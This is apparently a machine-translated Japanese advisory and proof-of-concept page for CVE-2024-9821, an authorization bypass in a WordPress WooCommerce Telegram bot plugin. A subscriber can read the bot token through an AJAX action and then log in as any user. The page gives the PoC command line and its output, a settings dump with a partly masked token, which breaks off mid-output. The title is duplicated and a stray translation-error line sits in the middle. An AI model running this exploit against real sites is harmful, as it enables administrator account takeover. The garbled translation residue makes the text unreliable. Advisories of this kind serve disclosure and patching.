
Bot for Telegram on WooCommerce <= 1.2.4 - 認証済み(購読者+)Telegram Bot トークンの開示による認証バイパス
Bot for Telegram on WooCommerce <= 1.2.4 - 認証済み(購読者以上)Telegram Botトークン開示による認証バイパス
WordPress用プラグイン「Bot for Telegram on WooCommerce」は、バージョン1.2.4以前のすべてのバージョンにおいて、'stm_wpcfto_get_settings' AJAXアクションに対する認可チェックが欠如しているため、機密情報の開示に対して脆弱です。このため、購読者レベル以上のアクセス権を持つ認証済み攻撃者が、ボットを制御するための秘密トークンであるTelegram Botトークンを閲覧でき、さらに「Login with Telegram」機能により、ユーザー名を知っていれば、管理者などサイト上の任意の既存ユーザーとしてログインすることが可能になります。``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
入力内容が空です。翻訳するテキストが提供されていないため、翻訳を生成できません。``` Vulnerability check: http://kubernetes.docker.internal Logged in successfully. { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' 'Bot Token', 'type': 'text', 'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'}, 'bftow_bot_name': { 'description': 'Set ' 'if ' 'you ' 'want ' 'user ' 'to ' 'get ' 'back ' 'to ' 'Telegram ' 'after ' 'successful ' 'checkout. ' '(Without ' '"@")', 'label': 'Telegram ' 'Bot Name', 'type': 'text', 'value': 'Superbotman'}, 'bftow_buttons': { 'description': 'Save ' 'BOT ' 'Token ' 'first', 'label': 'Activate ' 'API URL', 'type': 'bftow_webhook_activation', 'value': ''}, 'bftow_google_maps_api_key': { 'description': '<a ' 'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide ' 'Google ' 'Maps ' 'API ' 'key ' 'with ' 'enabled ' 'geocoding ' 'API ' 'and ' 'configured ' 'billing ' 'account. ' 'If ' 'you ' 'leave ' 'this ' 'field ' 'empty, ' 'the ' 'location ' 'will ' 'be ' 'taken ' 'via ' 'openstreetmap', 'label': 'Google ' 'Maps ' 'API ' 'key', 'pro': True, 'type': 'text', 'value': ''}, 'bftow_proxy_server': { 'label': 'Proxy ' 'server', 'type': 'text', 'value': 'https://api.telegram.org/bot'}}, 'name': 'BOT API Settings'}, 'interface_settings': { 'fields': { 'bftow_cart_on_site': { 'description': 'if ' 'enabled ' 'and ' 'the ' 'checkout ' 'occurs ' 'on ' 'the ' 'site, ' 'when ' 'clicking '